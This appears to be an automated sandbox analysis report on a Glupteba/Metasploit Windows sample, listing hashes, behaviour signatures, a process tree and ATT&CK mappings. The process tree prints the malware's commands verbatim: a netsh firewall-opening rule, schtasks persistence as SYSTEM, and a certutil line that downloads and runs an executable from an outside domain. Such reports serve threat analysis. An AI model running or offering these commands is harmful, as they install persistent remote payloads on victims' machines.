Analysis

  • max time kernel
    153s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2022 09:14

General

  • Target

    b47ad658af0f54b78b164f06544880959111e1008500609da85f4ccd4b76cea3.exe

  • Size

    3.8MB

  • MD5

    70458756d498f9fb5e724ed3ebd3ddf5

  • SHA1

    a1c525f7a312e74950c2c00e87006e46aaf9d4a0

  • SHA256

    b47ad658af0f54b78b164f06544880959111e1008500609da85f4ccd4b76cea3

  • SHA512

    87ea85ee5e58c6c2ff28256f2b5a47ecfe21f4209630b1683ccd21c45a0bf38c26508bfbd8fb02d0c3a958ea6c1e19da58b54e27c3cf3fc68de79646b214c401

  • SSDEEP

    98304:MfcPXi4rTNExqZ9BZUnr4wpZBPczsttE8r7MWNaJY80:qmS4gqZ9vUnr4g5b7MQYY

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 8 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b47ad658af0f54b78b164f06544880959111e1008500609da85f4ccd4b76cea3.exe
    "C:\Users\Admin\AppData\Local\Temp\b47ad658af0f54b78b164f06544880959111e1008500609da85f4ccd4b76cea3.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3120
    • C:\Users\Admin\AppData\Local\Temp\b47ad658af0f54b78b164f06544880959111e1008500609da85f4ccd4b76cea3.exe
      "C:\Users\Admin\AppData\Local\Temp\b47ad658af0f54b78b164f06544880959111e1008500609da85f4ccd4b76cea3.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3812
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3784
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          PID:4756
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2440
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2744
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1100
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          PID:2340
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:4680
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3812 -s 740
        3⤵
        • Program crash
        PID:1644
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3120 -s 724
      2⤵
      • Program crash
      PID:392
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4104
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3120 -ip 3120
    1⤵
      PID:2132
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3812 -ip 3812
      1⤵
        PID:3368

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        70458756d498f9fb5e724ed3ebd3ddf5

        SHA1

        a1c525f7a312e74950c2c00e87006e46aaf9d4a0

        SHA256

        b47ad658af0f54b78b164f06544880959111e1008500609da85f4ccd4b76cea3

        SHA512

        87ea85ee5e58c6c2ff28256f2b5a47ecfe21f4209630b1683ccd21c45a0bf38c26508bfbd8fb02d0c3a958ea6c1e19da58b54e27c3cf3fc68de79646b214c401

      • C:\Windows\rss\csrss.exe
        Filesize

        3.8MB

        MD5

        70458756d498f9fb5e724ed3ebd3ddf5

        SHA1

        a1c525f7a312e74950c2c00e87006e46aaf9d4a0

        SHA256

        b47ad658af0f54b78b164f06544880959111e1008500609da85f4ccd4b76cea3

        SHA512

        87ea85ee5e58c6c2ff28256f2b5a47ecfe21f4209630b1683ccd21c45a0bf38c26508bfbd8fb02d0c3a958ea6c1e19da58b54e27c3cf3fc68de79646b214c401

      • memory/1100-150-0x0000000000000000-mapping.dmp
      • memory/2340-151-0x0000000000000000-mapping.dmp
      • memory/2440-147-0x0000000001A00000-0x0000000002204000-memory.dmp
        Filesize

        8.0MB

      • memory/2440-146-0x0000000001600000-0x00000000019A8000-memory.dmp
        Filesize

        3.7MB

      • memory/2440-154-0x0000000000400000-0x0000000000C65000-memory.dmp
        Filesize

        8.4MB

      • memory/2440-148-0x0000000000400000-0x0000000000C65000-memory.dmp
        Filesize

        8.4MB

      • memory/2440-142-0x0000000000000000-mapping.dmp
      • memory/2744-149-0x0000000000000000-mapping.dmp
      • memory/3120-136-0x0000000001304000-0x00000000016AC000-memory.dmp
        Filesize

        3.7MB

      • memory/3120-137-0x0000000000400000-0x0000000000C65000-memory.dmp
        Filesize

        8.4MB

      • memory/3120-133-0x00000000016B0000-0x0000000001EB4000-memory.dmp
        Filesize

        8.0MB

      • memory/3120-134-0x0000000000400000-0x0000000000C65000-memory.dmp
        Filesize

        8.4MB

      • memory/3120-132-0x0000000001304000-0x00000000016AC000-memory.dmp
        Filesize

        3.7MB

      • memory/3784-140-0x0000000000000000-mapping.dmp
      • memory/3812-135-0x0000000000000000-mapping.dmp
      • memory/3812-138-0x0000000001217000-0x00000000015BF000-memory.dmp
        Filesize

        3.7MB

      • memory/3812-145-0x0000000000400000-0x0000000000C65000-memory.dmp
        Filesize

        8.4MB

      • memory/3812-139-0x0000000000400000-0x0000000000C65000-memory.dmp
        Filesize

        8.4MB

      • memory/4680-153-0x0000000000000000-mapping.dmp
      • memory/4756-141-0x0000000000000000-mapping.dmp